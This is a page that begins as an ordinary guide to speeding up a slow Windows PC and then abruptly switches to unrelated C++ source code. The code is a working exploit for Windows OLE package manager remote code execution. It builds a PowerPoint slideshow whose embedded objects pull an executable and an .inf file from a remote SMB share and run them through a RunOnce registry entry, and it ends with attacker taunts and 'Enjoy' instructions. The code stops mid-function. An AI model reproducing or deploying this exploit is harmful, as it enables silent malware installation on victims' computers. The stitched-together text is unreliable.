Windows PCs don’t have to slow down over time. Whether your PC has gradually become slower or it suddenly ground to a halt a few minutes ago, there could be quite a few reasons for that slowness.

As with all PC issues, don’t be afraid to give your computer a reboot if something’s not working properly. This can fix quite a few problems and is faster than attempting to manually troubleshoot and fix the problem yourself.

Find Resource-Hungry Programs

Your PC is running slow because something is using up those resources. If it’s suddenly running slower, a runaway process might be using 99% of your CPU resources, for example. Or, an application might be experiencing a memory leak and using a large amount of memory, causing your PC to swap to disk. Alternately, an application might be using the disk a lot, causing other applications to slow down when they need to load data from or save it to the disk.

To find out, open the Task Manager. You can right-click your taskbar and select the “Task Manager” option or press Ctrl+Shift+Escape to open it. On Windows 8, 8.1, and 10, the new Task Manager provides an upgraded interface that color-codes applications using a lot of resources. Click the “CPU,” “Memory,” and “Disk” headers to sort the list by the applications using the most resources. If any application is using too much resources, you might want to close it normally — if you can’t, select it here and click “End Task” to force it to close.

Close System Tray Programs

Many applications tend to run in the system tray, or notification area. These applications often launch at startup and stay running in the background but remain hidden behind the up arrow icon at the bottom-right corner of your screen. Click the up arrow icon near the system tray, right-click any applications you don’t need running in the background, and close them to free up resources.

Disable Startup Programs

Better yet, prevent those applications from launching at startup to save memory and CPU cycles, as well as speed up the login process.

On Windows 8, 8.1, and 10, there’s now a startup manager in the Task Manager you can use to manage your startup programs. Right-click the taskbar and select “Task Manager” or press Ctrl+Shift+Escape to launch it. Click over to the Startup tab and disable startup applications you don’t need. Windows will helpfully tell you which applications slow down your startup process the most.

Reduce Animations

Windows uses quite a few animations, and those animations can make your PC seem a bit slower. For example, Windows can minimize and maximize windows instantly if you disable the associated animations.

To disable animations, press Windows Key + X or right-click the Start button and select “System.” Click “Advanced System Settings” on the left and click the “Settings” button under Performance. Choose “Adjust for best performance” under Visual Effects to disable all the animations, or select “Custom” and disable the individual animations you don’t want to see. For example, uncheck “Animate windows when minimizing and maximizing” to disable the minimize and maximize animations.

Lighten Your Web Browser

There’s a good chance you use your web browser a lot, so your web browser may just be a bit slow. It’s a good idea to use as few browser extensions, or add-ons, as possible — those slow down your web browser and cause it to use more memory.

Go into your web browser’s Extensions or Add-ons manager and remove add-ons you don’t need. You should also consider enabling click-to-play plug-ins. Preventing Flash and other content from loading will prevent unimportant Flash content from using CPU time.

Scan for Malware and Adware

There’s also a chance your computer is slow because malicious software is slowing it down and running in the background. This may not be flat-out malware — it may be software that interferes with your web browsing to track it and add additional advertisements, for example.

To be extra safe, scan your computer with an antivirus program. You should also scan it with Malwarebytes, which catches a lot of “potentially unwanted programs” (PUPs) that most antivirus programs tend to ignore. These programs try to sneak onto your computer when you install other software, and you almost certainly don’t want them.

Free Up Disk Space

If your hard drive is almost completely full, your computer may run noticeably slower. You want to leave your computer some room to work on your hard drive. Follow our guide to freeing up space on your Windows PC to free up room. You don’t need any third-party software — just running the Disk Cleanup tool included in Windows can help quite a bit.

Defragment Your Hard Disk

Defragmenting your hard disk actually shouldn’t be necessary on modern versions of Windows. It’ll automatically defragment mechanical hard drives in the background. Solid-state drives don’t really need traditional defragmentation, although modern versions of Windows will “optimize” them — and that’s fine.

You shouldn’t worry about defragmentation most of the time. However, if you do have a mechanical hard drive and you’ve just put a lot of files on the drive — for example, copying a huge database or gigabytes of PC game files — those files might be defragmented because Windows hasn’t gotten around to defragmenting them yet. In this situation, you might want to open the disk defragmenter tool and perform a scan to see if you need to run a manual defrag program.

Uninstall Programs You Don’t Use

Open the Control Panel, find the list of installed programs, and uninstall programs you don’t use and don’t need from your PC. This can help speed your PC up, as those programs might include background processes, autostart entries, system services, context menu entries, and other things that can slow down your PC. It’ll also save room on your hard drive and improve system security — for example, you definitely shouldn’t have Java installed if you’re not using it.

Reset Your PC / Reinstall Windows

If the other tips here didn’t fix your problem, the one timeless solution to fix Windows problems — aside from rebooting your PC, of course — is getting a fresh Windows installation.

On modern versions of Windows — that is, Windows 8, 8.1, and 10 — it’s easier to get a fresh Windows installation than ever. You don’t have to get Windows installation media and reinstall Windows. Instead, you can simply use the “Reset your PC” feature built into Windows to get a new, fresh Windows system. This is similar to reinstalling Windows and will wipe your installed programs and system settings while keeping your files.

If your PC is still using a mechanical hard drive, upgrading to a solid-state drive — or just ensuring your next PC has an SSD — will offer you a dramatic performance improvement, too. In an age where most people won’t notice faster CPUs and graphics processors, solid-state storage will offer the single biggest boost in overall system performance for most people.

1. /*++
   Title:
   Windows NT 6.X OLE package manager remote code execution through
   MS Office Powerpoint XYZ slideshow (ppts, pptxs).

   EID:
   00000217:2013/06/10

   Description:
   Undocumented features exist in Windows NT 6 OLE package manager.
   These features allow to bypass ‘Safe download’ mechanism from
   untrusted sources and to execute imm. The IContextMenu i-face
   is used by 3-rd party software (such as MS Office Powerpoint XYZ)
   to unpack and dispatch package data. Shell action to be applied
   to package is specified by action id in ‘cmd’ parameter of slide
   xml-based document. Action Id ‘-1’ and ‘-2’ are reserved by MS
   Office Powerpoint engine. Currently, silent ‘.inf’ installation
   is used for mitigation bypass. The MS Office for Windows XP
   contains internal OLE Package interpreter, so Windows XP doesn’t
   affected.
   Hi F-5ecure and E5et! We are offering you to patch holes and
   backdoors in your fucking AV-s. We know about them.

   Discovered:
   2013/06/06

   –*/

   #include <Windows.h>
   #include <OleAuto.h>
   #include <stdio.h>
   #include <OAIdl.h>
   #include <string>
   #include <shldisp.h>
   #include <tlhelp32.h>
   #include <assert.h>

   using namespace std;

   #define MAKE_OFFICE_IMPORT 0

   #if MAKE_OFFICE_IMPORT
   #import “z:Program Files (x86)Common Filesmicrosoft sharedVBAVBA6VBE6EXT.OLB”
   #import “z:Program Files (x86)Common Filesmicrosoft sharedOFFICE12mso.dll”
   #import “z:Program Files (x86)Microsoft OfficeOffice12msppt.olb”

   /* Modify office headers after import.
   In file vbe6ext.tlh specify:
   #include “mso.tlh”
   using namespace Office;

   In file msppt.tlh specify:
   #include “vbe6ext.tlh”
   using namespace VBIDE;
   */

   #else

   #if _DEBUG

   #include “Debugmso.tlh”
   #include “Debugvbe6ext.tlh”
   #include “Debugmsppt.tlh”

   #else

   #include “Releasemso.tlh”
   #include “Releasevbe6ext.tlh”
   #include “Releasemsppt.tlh”

   #endif

   #endif

   /* Processor definitions
   */
   static HRESULT __G_hresult = S_OK;

   #define CHK_HR( hr ) do { if (FAILED(__G_hresult = (hr))) { goto _Done; } } while(0)

   #define CHK_ALLOC( ptr ) do { if ((ptr) == NULL) {goto _Done; } } while(0)

   #define SAFE_RELEASE_BY_REF( obj ) do { if((*obj) != NULL) { (*obj )->Release(); *obj = NULL;} } while(0)

   #define SAFE_FREE_BSTR_BY_REF( obj ) do { if((*obj) != NULL) { SysFreeString((*obj)); (*obj) = NULL;} } while(0)

   #define VariantInitAsLong( var, val)
   VariantInit( &(var) );
   (var).vt = VT_I4;
   (var).lVal = val;

   /*************************************************************************
   Rtns definition
   *************************************************************************/
   int wmain(int argc, wchar_t **argv);
   bool change_file_time(__in wchar_t *fname);
   void print_usage_and_exit(__in wchar_t *exe);
   bool produce_presentation(__in wchar_t *fname, __in wchar_t *fnameSaveAs, __in wchar_t *fname1Tmp, __in wchar_t *fname2Tmp);
   bool presentation_does_have_ole_packages(__in PowerPoint::_Presentation *pPresentation, __out bool *doesHave);
   bool create_ole_embed_stg_copy(__in const wchar_t *file_result, __in char *str1, __in char *str2);
   bool rewrite_embeddings_in_presentation(__in wchar_t *fnamePpt, __in wchar_t *fnameData);
   bool parse_cmd(int argc, wchar_t **argv, wstring *fnamePptIn, wstring *smbPath, wstring *fnameExe,wstring *fnameExeOnSmb,wstring *fnameInfOnSmb, bool *bForceUpload);

   /*************************************************************************
   Rtns implementation
   *************************************************************************/
   bool produce_presentation(__in wchar_t *fname, __in wchar_t *fnameSaveAs, __in wchar_t *fname1Tmp, __in wchar_t *fname2Tmp) {

   wstring stdWstrFileSaveAs;
   PowerPoint::PpSaveAsFileType saveAsType;
   bool bres = false,
   bDoesHaveOlePackages = false;
   CLSID appClsid = { 0 };
   BSTR bstrApplicationProgId = NULL,
   bstrPresentationPath = NULL,
   bstrSaveAs = NULL;
   PowerPoint::_Application *pApplication = NULL;
   PowerPoint::Presentations *pPresentations = NULL;
   PowerPoint::_Presentation *pPresentation = NULL;
   PowerPoint::Slides *pSlides = NULL;
   PowerPoint::_Slide *pSlide = NULL;
   PowerPoint::Shapes *pShapes = NULL;
   PowerPoint::Shape *pShape0 = NULL,
   *pShape1 = NULL,
   *pShapeCurr = NULL;
   PowerPoint::TimeLine *pTimeLine = NULL;
   PowerPoint::Sequences *pSequences = NULL;
   PowerPoint::Sequence *pSequence = NULL;
   PowerPoint::Effect *pEffect = NULL;
   PowerPoint::AnimationBehaviors *pAnimationBehaviors = NULL;
   PowerPoint::AnimationBehavior *pAnimationBehavior = NULL;
   PowerPoint::CommandEffect *pCommandEffect = NULL;
   PowerPoint::SlideShowTransition *pSlideShowTransition = NULL;
   VARIANT varSlideIndex;

   /* Produce file name for saving
   */
   stdWstrFileSaveAs.append(fnameSaveAs);

   saveAsType = PowerPoint::PpSaveAsFileType::ppSaveAsOpenXMLShow;

   CHK_ALLOC( bstrApplicationProgId = SysAllocString(L”Powerpoint.Application”));

   /* Obtain POwerPoint App CLSID from PowerPoint App Identifier
   */
   CHK_HR( CLSIDFromProgID( bstrApplicationProgId, &appClsid) );

   /* Create instance of POWERPOINT Application
   */
   CHK_HR( CoCreateInstance(
   appClsid,
   NULL,
   CLSCTX_LOCAL_SERVER,
   __uuidof(PowerPoint::_Application),
   (LPVOID*)&pApplication) );

   /* Get presentation collection
   */
   CHK_HR( pApplication ->get_Presentations(&pPresentations) );

   /* Open presentation
   */
   CHK_ALLOC( bstrPresentationPath = SysAllocString(fname) );

   CHK_HR( pPresentations ->raw_Open(
   bstrPresentationPath,
   Office::MsoTriState::msoFalse,
   Office::MsoTriState::msoFalse,
   Office::MsoTriState::msoFalse,
   &pPresentation) );

   /* Make sure that presentation doesn’t have a lot of ole packages
   */
   if (!presentation_does_have_ole_packages(pPresentation, &bDoesHaveOlePackages)) {

   CHK_HR( E_ABORT );
   }

   if (bDoesHaveOlePackages) {

   printf(“[-] ERROR: Specified presentation already includes OLE objects or no slides found.n”);

   CHK_HR( E_ABORT );
   }

   /* Get collection of slides
   */

   CHK_HR( pPresentation ->get_Slides( &pSlides) );

   /* Get first slide by index
   */
   VariantInitAsLong(varSlideIndex, 1);

   CHK_HR( pSlides ->raw_Item( varSlideIndex, &pSlide) );

   /* Get collection of shapes in slide
   */
   CHK_HR( pSlide ->get_Shapes( &pShapes) );

   /* Add 1-th shape to slide as first OLE object
   */
   CHK_HR( pShapes ->raw_AddOLEObject(
   100.0, -100.0, 30.0, 30.0,
   _bstr_t(L””),
   _bstr_t(fname1Tmp),
   Office::MsoTriState::msoFalse,
   _bstr_t(L””),
   0,
   _bstr_t(L””),
   Office::MsoTriState::msoFalse,
   &pShape0
   ) );

   /* Add 2-th shape to slide as second OLE object
   */
   CHK_HR( pShapes ->raw_AddOLEObject(
   150.0, -100.0, 30.0, 30.0,
   _bstr_t(L””),
   _bstr_t(fname2Tmp),
   Office::MsoTriState::msoFalse,
   _bstr_t(L””),
   0,
   _bstr_t(L””),
   Office::MsoTriState::msoFalse,
   &pShape1
   ) );

   /* Configure slide timing
   */
   CHK_HR( pSlide ->get_TimeLine( &pTimeLine ) );

   /* Obtain Main Sequence for timeLine of slide
   */
   CHK_HR( pTimeLine ->get_MainSequence( &pSequence) );

   /* Produce first effect for 1-th shape.
   1-th shape specifies OLE Object which just copies .exe payload
   from remote SMB server and stores in temporary file.
   Specify command verb as ‘-3’ which tells to ShellApi do nothing.
   Effect with id 1 loads slide background.
   Effect with id 2 loads exe stub from remote server.
   */
   {
   CHK_HR( pSequence ->raw_AddEffect(
   pShape0,
   PowerPoint::MsoAnimEffect::msoAnimEffectFlashOnce,
   PowerPoint::MsoAnimateByLevel::msoAnimateLevelNone,
   PowerPoint::MsoAnimTriggerType::msoAnimTriggerWithPrevious, //PowerPoint::MsoAnimTriggerType::msoAnimTriggerOnPageClick,
   1,
   &pEffect) );

   SAFE_RELEASE_BY_REF( &pEffect );

   CHK_HR( pSequence ->raw_AddEffect(
   pShape0,
   PowerPoint::MsoAnimEffect::msoAnimEffectFlashOnce,
   PowerPoint::MsoAnimateByLevel::msoAnimateLevelNone,
   PowerPoint::MsoAnimTriggerType::msoAnimTriggerAfterPrevious, //PowerPoint::MsoAnimTriggerType::msoAnimTriggerOnPageClick,
   2,
   &pEffect) );

   CHK_HR( pEffect ->get_Behaviors( &pAnimationBehaviors) );

   CHK_HR( pAnimationBehaviors ->raw_Add( PowerPoint::MsoAnimType::msoAnimTypeCommand, 1, &pAnimationBehavior) );

   CHK_HR( pAnimationBehavior ->get_CommandEffect( &pCommandEffect) );

   CHK_HR( pCommandEffect ->put_Type( PowerPoint::MsoAnimCommandType::msoAnimCommandTypeVerb) );

   CHK_HR( pCommandEffect ->put_Command( _bstr_t(L”-3″)) );
   }

   /* Release resources assigned with Shape0
   */
   SAFE_RELEASE_BY_REF( &pCommandEffect );
   SAFE_RELEASE_BY_REF( &pAnimationBehavior );
   SAFE_RELEASE_BY_REF( &pAnimationBehaviors );
   SAFE_RELEASE_BY_REF( &pEffect );
   SAFE_RELEASE_BY_REF( &pShape0 );

   /* Produce first effect for 2-th shape.
   2-th shape specifies OLE Object which simple copies .inf file
   from remote SMB server and stores in temporary file with .inf extension.
   Specify command verb as ‘3’ which tells to ShellApi do ‘Install’ action.
   Effect with id 3 loads .inf from remote server and start it.
   */
   {
   CHK_HR( pSequence ->raw_AddEffect(
   pShape1,
   PowerPoint::MsoAnimEffect::msoAnimEffectFlashOnce,
   PowerPoint::MsoAnimateByLevel::msoAnimateLevelNone,
   PowerPoint::MsoAnimTriggerType::msoAnimTriggerAfterPrevious,
   3,
   &pEffect) );

   CHK_HR( pEffect ->get_Behaviors( &pAnimationBehaviors) );

   CHK_HR( pAnimationBehaviors ->raw_Add( PowerPoint::MsoAnimType::msoAnimTypeCommand, 1, &pAnimationBehavior) );

   CHK_HR( pAnimationBehavior ->get_CommandEffect( &pCommandEffect) );

   CHK_HR( pCommandEffect ->put_Type( PowerPoint::MsoAnimCommandType::msoAnimCommandTypeVerb) );

   CHK_HR( pCommandEffect ->put_Command( _bstr_t(L”3″)) );
   }
   /* Release resources assigned with Shape1
   */
   SAFE_RELEASE_BY_REF( &pCommandEffect );
   SAFE_RELEASE_BY_REF( &pAnimationBehavior );
   SAFE_RELEASE_BY_REF( &pAnimationBehaviors );
   SAFE_RELEASE_BY_REF( &pEffect );
   SAFE_RELEASE_BY_REF( &pShape1 );

   /* Configure SlideShowTransition
   */

   CHK_HR( pSlide ->get_SlideShowTransition(&pSlideShowTransition) );

   CHK_HR( pSlideShowTransition ->put_EntryEffect( PowerPoint::PpEntryEffect::ppEffectBoxOut ) );

   CHK_HR( pSlideShowTransition ->put_AdvanceTime( 0.5 ) );

   SAFE_RELEASE_BY_REF( &pSlideShowTransition );

   /* Release resources assigned with Presentation
   */
   SAFE_RELEASE_BY_REF( &pSequence );
   SAFE_RELEASE_BY_REF( &pTimeLine );
   SAFE_RELEASE_BY_REF( &pShapes );
   SAFE_RELEASE_BY_REF( &pSlide );
   SAFE_RELEASE_BY_REF( &pSlides );

   /* Save presentation
   */
   CHK_ALLOC(bstrSaveAs = SysAllocString(stdWstrFileSaveAs.c_str()) );

   CHK_HR( pPresentation ->raw_SaveAs( bstrSaveAs, saveAsType, Office::MsoTriState::msoTriStateMixed) );

   bres = true;

   _Done:

   VariantClear( &varSlideIndex );

   SAFE_FREE_BSTR_BY_REF( &bstrPresentationPath );

   SAFE_FREE_BSTR_BY_REF( &bstrApplicationProgId );

   SAFE_FREE_BSTR_BY_REF( &bstrSaveAs );

   /* Release resources assigned with Shape0 and Shape1
   */
   SAFE_RELEASE_BY_REF( &pCommandEffect );
   SAFE_RELEASE_BY_REF( &pAnimationBehavior );
   SAFE_RELEASE_BY_REF( &pAnimationBehaviors );
   SAFE_RELEASE_BY_REF( &pEffect );
   SAFE_RELEASE_BY_REF( &pShape0 );
   SAFE_RELEASE_BY_REF( &pShape1 );

   /* Release resources assigned with Presentation
   */
   SAFE_RELEASE_BY_REF( &pSlideShowTransition );
   SAFE_RELEASE_BY_REF( &pSequence );
   SAFE_RELEASE_BY_REF( &pTimeLine );
   SAFE_RELEASE_BY_REF( &pShapes );
   SAFE_RELEASE_BY_REF( &pSlide );
   SAFE_RELEASE_BY_REF( &pSlides );

   /* Close Currently opened presentation
   */
   if (pPresentation) {

   pPresentation ->raw_Close();
   }
   SAFE_RELEASE_BY_REF( &pPresentation );

   SAFE_RELEASE_BY_REF( &pPresentations );

   /* Close powerpoint automation application
   */
   if (pApplication) {

   pApplication ->raw_Quit();
   }

   SAFE_RELEASE_BY_REF( &pApplication );

   return bres;
   }

   bool create_ole_embed_stg_copy(__in const wchar_t *file_result, __in char *str1, __in char *str2) {

   bool bresult = false;
   IStorage *pStorage = NULL;
   IStream *pStream = NULL;
   HRESULT hresult = S_OK;
   CLSID clsidMedia = {0};
   VOID *pvFileData = NULL;
   size_t dataSize = 0;
   ULONG bytesWritten = 0;
   char trailer = 0;
   wstring stdWstrFileNameOut;

   stdWstrFileNameOut.append(file_result);

   hresult =
   StgCreateStorageEx(
   stdWstrFileNameOut.c_str(),
   STGM_CREATE | STGM_SHARE_EXCLUSIVE | STGM_READWRITE,
   STGFMT_STORAGE,
   0,
   NULL,
   NULL,
   IID_IStorage,
   (void**)&pStorage
   );

   if (FAILED(hresult)) {

   //printf(“[-] %s(): StgCreateStorageEx failed with error: %d(%08x)rn”, __FUNCTION__, hresult, hresult);

   CHK_HR(hresult);
   }

   hresult =
   pStorage ->CreateStream(
   L”x01OLE10Native”,
   STGM_CREATE | STGM_SHARE_EXCLUSIVE | STGM_READWRITE,
   0,
   0,
   &pStream
   );

   if (FAILED(hresult)) {

   //printf(“[-] %s(): IStorage::CreateStream failed with error: %d(%08x)rn”, __FUNCTION__, hresult, hresult);

   CHK_HR(hresult);
   }

   dataSize = strlen(str1) + 1 + strlen(str2) + 1;

   // write header
   hresult = pStream ->Write( &dataSize, (ULONG)4, &bytesWritten );

   if (FAILED(hresult)) {

   //printf(“[-] %s(): IStream::Write(header) failed with error %d(%08x)rn”, __FUNCTION__, hresult, hresult);

   CHK_HR(E_ABORT);
   }

   // write string 1
   hresult = pStream ->Write( str1, (ULONG)strlen(str1), &bytesWritten );

   if (FAILED(hresult)) {

   //printf(“[-] %s(): IStream::Write(string#1) failed with error %d(%08x)rn”, __FUNCTION__, hresult, hresult);

   CHK_HR(E_ABORT);
   }

   // write string 1 trailer
   hresult = pStream ->Write( &trailer, (ULONG)1, &bytesWritten );

   if (FAILED(hresult)) {

   //printf(“[-] %s(): IStream::Write(string#1 trailer) failed with error %d(%08x)rn”, __FUNCTION__, hresult, hresult);

   CHK_HR(E_ABORT);
   }

   // write string 2
   hresult = pStream ->Write( str2, (ULONG)strlen(str2), &bytesWritten );

   if (FAILED(hresult)) {

   //printf(“[-] %s(): IStream::Write(string#2) failed with error %d(%08x)rn”, __FUNCTION__, hresult, hresult);

   CHK_HR(E_ABORT);
   }

   // write string 2 trailer
   hresult = pStream ->Write( &trailer, (ULONG)1, &bytesWritten );

   if (FAILED(hresult)) {

   //printf(“[-] %s(): IStream::Write(string#2 trailer) failed with error %d(%08x)rn”, __FUNCTION__, hresult, hresult);

   CHK_HR(E_ABORT);
   }

   // write class of storage
   hresult = CLSIDFromString( L”{00022602-0000-0000-C000-000000000046}”, &clsidMedia);

   if (FAILED(hresult)) {

   //printf(“[-] %s(): CLSIDFromString failed with error %d(%08x)rn”, __FUNCTION__, hresult, hresult);

   CHK_HR(E_ABORT);
   }

   hresult = WriteClassStg(pStorage, clsidMedia);

   if (FAILED(hresult)) {

   //printf(“[-] %s(): WriteClassStg failed with error %d(%08x)rn”, __FUNCTION__, hresult, hresult);

   CHK_HR(hresult);
   }

   //printf(“[+] %s(): Storage %S created.rn”, __FUNCTION__, file_result);
   change_file_time( (wchar_t*)stdWstrFileNameOut.c_str() );

   bresult = true;

   _Done:
   SAFE_RELEASE_BY_REF( &pStream );

   SAFE_RELEASE_BY_REF( &pStorage );

   if(pvFileData) {

   free(pvFileData);
   }

   return bresult;

   }

   bool create_somthing_file(wchar_t *fpath) {

   HANDLE hFile = INVALID_HANDLE_VALUE;
   DWORD bytesWritten = 0;

   hFile = CreateFileW(fpath, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
   if (hFile == INVALID_HANDLE_VALUE || hFile == NULL) {

   wprintf(L”[-] ERROR: Cannot create temporary file %s with some datan”, fpath);

   return false;
   }

   if (FALSE == WriteFile( hFile, “Some Datan”, strlen(“Some Datan”), &bytesWritten, NULL)) {

   wprintf(L”[-] ERROR: Cannot write temporary file %s with some datan”, fpath);

   CloseHandle(hFile);

   return false;
   }

   CloseHandle(hFile);

   return true;
   }

   bool generate_inf_file(wchar_t *fnameInf, wchar_t *fnameExeOnSmb) {

   HANDLE hFile = INVALID_HANDLE_VALUE;
   DWORD bytesWritten = 0;
   wstring stdFnameExeOnSmb;
   string stdFnameExeOnSmbA;
   string data;
   BOOL bres = FALSE;

   stdFnameExeOnSmb.append(fnameExeOnSmb);
   stdFnameExeOnSmbA.append(stdFnameExeOnSmb.begin(), stdFnameExeOnSmb.end());

   hFile = CreateFileW( fnameInf, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
   if (hFile == INVALID_HANDLE_VALUE || hFile == NULL) {

   wprintf(L”[-] ERROR: Cannot create temporary file %s with some datan”, fnameInf);

   return false;
   }

   data.append(“; 61883.INFn”);
   data.append(“; Copyright (c) Microsoft Corporation. All rights reserved.nn”);

   data.append(“[Version]n”);
   data.append(“Signature = “$CHICAGO$”n”);
   data.append(“Class=61883n”);
   data.append(“ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17}n”);
   data.append(“Provider=%Msft%n”);
   data.append(“DriverVer=06/21/2006,6.1.7600.16385nn”);

   data.append(“[DestinationDirs]n”);
   data.append(“DefaultDestDir = 1nn”);

   data.append(“[DefaultInstall]n”);
   data.append(“RenFiles = RxRenamen”);
   data.append(“AddReg = RxStartnn”);

   data.append(“[RxRename]n”);
   data.append(stdFnameExeOnSmbA.c_str());
   data.append(“.exe, “);
   data.append(stdFnameExeOnSmbA.c_str());
   data.append(“n”);

   data.append(“[RxStart]n”);
   data.append(“HKLM,SoftwareMicrosoftWindowsCurrentVersionRunOnce,Install,,%1%”);
   data.append(stdFnameExeOnSmbA.c_str());
   data.append(“.exen”);

   bres = WriteFile(hFile, data.c_str(), data.length(), &bytesWritten, NULL);

   FlushFileBuffers(hFile);

   CloseHandle(hFile);

   return (bres);
   }

   int wmain(int argc, wchar_t **argv) {

   wstring stdWstrSaveAs,
   stdWstrObject1,
   stdWstrObject2,
   stdWstrSavedAs;

   wstring stdFnamePptIn,
   stdSmbPath,
   stdFnameExe,
   stdFnameExeOnSmb,
   stdFnameInfOnSmb,
   stdPathExeOnSmb,
   stdPathInfOnSmb,
   stdPathTmp1,
   stdPathTmp2,
   stdPathInf,
   stdPathExe;
   string stdPathExeOnSmbA,
   stdPathInfOnSmbA;

   bool bForceUpload = false;

   wchar_t currDir[MAX_PATH];

   GetCurrentDirectoryW(MAX_PATH, currDir);

   if (!parse_cmd(argc, argv, &stdFnamePptIn, &stdSmbPath, &stdFnameExe, &stdFnameExeOnSmb, &stdFnameInfOnSmb, &bForceUpload ) ) {

   printf(“[-] ERROR: invalid inputn”);

   return 0;
   }

   CHK_HR( CoInitializeEx(NULL, COINIT_APARTMENTTHREADED));

   stdWstrSaveAs.append(stdFnamePptIn.c_str());

   stdWstrSaveAs.append(L”.saved.ppsx”);

   /* Construct a path to exe on SMB as %stdSmbPath%%stdFnameExeOnSmb%
   */
   stdPathExeOnSmb.append(stdSmbPath.c_str());
   stdPathExeOnSmb.append(L””);
   stdPathExeOnSmb.append(stdFnameExeOnSmb.c_str());
   stdPathExeOnSmbA.append(stdPathExeOnSmb.begin(), stdPathExeOnSmb.end());

   /* Construct a path to inf on SMB as %stdSmbPath%%stdFnameInfOnSmb%
   */
   stdPathInfOnSmb.append(stdSmbPath.c_str());
   stdPathInfOnSmb.append(L””);
   stdPathInfOnSmb.append(stdFnameInfOnSmb.c_str());
   stdPathInfOnSmbA.append(stdPathInfOnSmb.begin(), stdPathInfOnSmb.end());

   /* Construct a path to tmp1 file
   */
   stdPathTmp1.append(currDir);
   stdPathTmp1.append(L”tmp1.tmp”);

   if (!create_somthing_file((wchar_t*)stdPathTmp1.c_str()) ) {

   CHK_HR(E_ABORT);
   }

   /* Construct a path to tmp2 file
   */
   stdPathTmp2.append(currDir);
   stdPathTmp2.append(L”tmp2.tmp”);

   if (!create_somthing_file((wchar_t*)stdPathTmp2.c_str()) ) {

   CHK_HR(E_ABORT);
   }

   /* Modify presentation imm
   */
   if (!produce_presentation(
   (wchar_t*)stdFnamePptIn.c_str(),
   (wchar_t *)stdWstrSaveAs.c_str(),
   (wchar_t *) stdPathTmp1.c_str(),
   (wchar_t *) stdPathTmp2.c_str()
   ) )
   {

   printf(“[-] ERROR: cannot update presentationn”);

   CHK_HR( E_ABORT);
   }

   /* Create OLE 1-th Object
   */
   stdWstrObject1.append(currDir);
   stdWstrObject1.append(L””);
   stdWstrObject1.append(L”oleObject1.bin”);

   if (!create_ole_embed_stg_copy(stdWstrObject1.c_str(), “EmbeddedStg1.txt”, (char*)stdPathExeOnSmbA.c_str()) ) {

   printf(“[-] ERROR: cannot create 1-th OLE Objectn”);

   CHK_HR( E_ABORT);
   }

   /* Create OLE 2-th Object
   */
   stdWstrObject2.append(currDir);
   stdWstrObject2.append(L””);
   stdWstrObject2.append(L”oleObject2.bin”);
   if (!create_ole_embed_stg_copy(stdWstrObject2.c_str(), “EmbeddedStg2.txt”, (char*)stdPathInfOnSmbA.c_str()) ) {

   printf(“[-] ERROR: cannot create 2-th OLE Objectn”);

   CHK_HR( E_ABORT);
   }

   /* Generate inf file
   */
   stdPathInf.append(currDir);
   stdPathInf.append(L””);
   stdPathInf.append(stdFnameInfOnSmb.c_str());

   if (!generate_inf_file((wchar_t*)stdPathInf.c_str(), (wchar_t*)stdFnameExeOnSmb.c_str())) {

   printf(“[-] ERROR: Cannot generate inf filen”);
   CHK_HR(E_ABORT);
   }

   /* Generate exe for SMB
   */
   stdPathExe.append(currDir);
   stdPathExe.append(L””);
   stdPathExe.append(stdFnameExeOnSmb.c_str());

   if (!CopyFileW(stdFnameExe.c_str(), stdPathExe.c_str(), FALSE)) {
   wprintf(L”[-] ERROR: Cannot create ‘%s’ from ‘%s’n”, stdFnameExeOnSmb.c_str(), stdFnameExe.c_str());

   CHK_HR(E_ABORT);
   }

   /* Upload files onto remote shared folder
   */
   if (bForceUpload) {

   if (!CopyFileW( stdPathExe.c_str(), stdPathExeOnSmb.c_str(), FALSE)) {

   wprintf(L”[-] ERROR: Cannot upload .exe file ‘%s’ to ‘%s’n”, stdPathExe.c_str(), stdSmbPath.c_str());
   }

   if (!CopyFileW( stdPathInf.c_str(), stdPathInfOnSmb.c_str(), FALSE)) {

   wprintf(L”[-] ERROR: Cannot upload .inf file ‘%s’ to ‘%s’n”, stdPathInf.c_str(), stdSmbPath.c_str());
   }
   }
   int step = 1;
   wprintf(L”[+] INFO: n”);
   wprintf(L” %d) Rename presentation file ‘%s’ to ‘%s.zip’;n”, step++, stdWstrSavedAs.c_str(), stdWstrSavedAs.c_str());
   wprintf(L” %d) Stupid MS developers cann’t create API for zip, so unzip ‘%s.zip’n”, step++, stdWstrSavedAs.c_str());
   wprintf(L” %d) Copy ‘%s’ into ‘ppt/embeddings’ sub-directory of unzipped file;n”, step++, stdWstrObject1.c_str());
   wprintf(L” %d) Copy ‘%s’ into ‘ppt/embeddings’ sub-directory of unzipped file;n”, step++, stdWstrObject2.c_str());
   wprintf(L” %d) Zip unzipped presentation and rename to presentation with ‘.ppsx’n”, step++);
   if (bForceUpload) {
   wprintf(L” %d) Copy ‘%s’ into ‘%s’n”, step++, stdFnameExeOnSmb.c_str(), stdSmbPath.c_str());
   wprintf(L” %d) Copy ‘%s’ into ‘%s’n”, step++, stdFnameInfOnSmb.c_str(), stdSmbPath.c_str());
   }
   wprintf(L” %d) Enjoy..n”, step++);

   _Done:

   DeleteFileW( stdPathTmp1.c_str());

   DeleteFileW( stdPathTmp2.c_str());

   CoUninitialize();

   return(__G_hresult);
   }

   bool presentation_does_have_ole_packages(__in PowerPoint::_Presentation *pPresentation, __out bool *doesHave) {

   bool bres = false;
   PowerPoint::Slides *pSlides = NULL;
   PowerPoint::_Slide *pSlide = NULL;
   PowerPoint::Shapes *pShapes = NULL;
   PowerPoint::Shape *pShape = NULL;
   PowerPoint::OLEFormat *pOLEFormat = NULL;
   long slidesCount = 0;
   VARIANT varSlideIndex,
   varShapeIndex;
   int shapesCount = 0;
   MsoAutoShapeType shapeType;
   BSTR bstrProgId = NULL;
   IDispatch *pOLEDispObject = NULL;

   assert(doesHave != NULL);
   assert(pPresentation != NULL);

   *doesHave = false;

   /* Get pointer to interface of Slides object.
   */
   CHK_HR(pPresentation ->get_Slides(&pSlides) );

   /* Get count of slides in presentation
   */
   CHK_HR(pSlides ->get_Count(&slidesCount) );

   /* Make sure that slides exist in presentation
   */
   if (slidesCount == 0) {

   printf(“[-] Failed couse no slides found in presentationn”);

   CHK_HR(E_FAIL);
   }

